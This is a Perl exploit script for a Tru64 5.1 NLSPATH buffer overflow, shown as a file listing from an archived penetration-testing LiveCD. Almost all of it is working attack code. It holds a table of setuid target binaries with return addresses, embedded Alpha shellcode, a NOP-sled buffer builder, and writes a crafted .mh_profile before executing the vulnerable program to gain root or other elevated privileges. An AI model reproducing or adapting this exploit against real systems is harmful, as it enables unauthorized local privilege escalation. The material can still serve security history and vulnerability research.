home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / tru64 / TRU64_nlspath.pl < prev    next >
Text File  |  2005-02-12  |  3KB  |  104 lines
  1.               
  2.  
  3. #!/usr/bin/perl -w
  4. #
  5.  
  6.  
  7. # Tru64 5.1 NLSPATH
  8. #
  9. # stripey (stripey@snosoft.com) - 03/07/2002
  10. #
  11.  
  12. $tgts{"0"} = pack("l",0x40011a10).":/usr/tcb/bin/edauth:uid=root";
  13. $tgts{"1"} = pack("l",0x40014280).":/usr/sbin/imapd:euid=root";
  14. $tgts{"2"} = pack("l",0x400120b0).":/usr/bin/rdist:euid=root";
  15. $tgts{"3"} = pack("l",0x40014a80).":/usr/bin/mh/inc:euid=root";
  16. $tgts{"4"} = pack("l",0x40010104).":/usr/bin/mh/msgchk:euid=root";
  17. $tgts{"5"} = pack("l",0x40010c04).":/usr/dt/bin/dtsession:euid=root";
  18. $tgts{"6"} = pack("l",0x400a7908).":/usr/bin/X11/dxsysinfo:euid=root, requires valid \$DISPLAY";
  19. $tgts{"7"} = pack("l",0x4009f2f8).":/usr/tcb/bin/dxchpwd:euid=root, requires valid \$DISPLAY";
  20. $tgts{"8"} = pack("l",0x400105e8).":/usr/bin/deliver:euid=imap";
  21. $tgts{"9"} = pack("l",0x4003c190).":/usr/bin/uucp:euid=uucp,egid=uucp";
  22. $tgts{"A"} = pack("l",0x400361f0).":/usr/bin/uux:euid=uucp,egid=uucp";
  23.  
  24. unless (($target,$offset,$align) = @ARGV,$align) {
  25.  
  26.         print "-"x72;
  27.         print "\n        Tru64 NLSPATH overflow, stripey\@snosoft.com, 03/07/2002\n";
  28.         print "-"x72;
  29.         print "\n\nUsage: $0 <target> <offset> <align>\n\nTargets:\n\n";
  30.  
  31.         foreach $key (sort(keys %tgts)) {
  32.                 ($a,$b,$c) = split(/\:/,$tgts{"$key"});
  33.                 print "\t$key. $b ( $c )\n";
  34.         }
  35.  
  36.         print "\n";
  37.         exit 1;
  38. }
  39.  
  40. ($a,$b) = split(/\:/,$tgts{"$target"});
  41.  
  42. print "*** Target: $b, Offset: $offset, Align: $align ***\n\n";
  43.  
  44. $ret = pack("ll",(unpack("l",$a)+$offset), 0x1);
  45.  
  46. $sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
  47. $sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
  48. $sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
  49. $sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
  50. $sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
  51. $sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
  52. $sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
  53. $sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
  54. $sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
  55. $sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";
  56.  
  57. $tlen = (1024-(length($sc)))/4;
  58.  
  59. $buf .= "B"x$align;
  60. $buf .= pack("l",0x47ff041f)x($tlen-1);
  61. $buf .= $sc;
  62. $buf .= $ret;
  63.  
  64. $ENV{"NLSPATH"} = $buf;
  65.  
  66. if ($target eq 8) { print "Hit ctrl-d...\n"; }
  67.  
  68. if ($target eq 3) {
  69.  
  70.         $buf_b  = "AA";
  71.         $buf_b .= pack("l",0x47ff041f)x512;
  72.         $buf_b .= $sc;
  73.  
  74.         open(OH,">.mh_profile");
  75.         print OH "Path: $buf_b\n";
  76.         close(OH);
  77. }
  78.  
  79. if ($target eq "4") {
  80.  
  81.         $buf_b  = "AA";
  82.         $buf_b .= pack("l",0x47ff041f)x2000;
  83.         $buf_b .= $sc;
  84.  
  85.         open(OH,">.mh_profile");
  86.         print OH "Path: $buf_b\n";
  87.         close(OH);
  88. }
  89.  
  90. if ($target eq 2) {
  91.  
  92.         exec("$b","-d","a=asdf","-c","/tmp/","\'\$\{a\}\'");
  93.  
  94. }
  95. if ($target eq 0) {
  96.  
  97.         $buf_b = "B"x30000;
  98.         exec("$b","-g","-dt",$buf_b);
  99.  
  100. }
  101.  
  102. exec("$b");
  103.  
  104.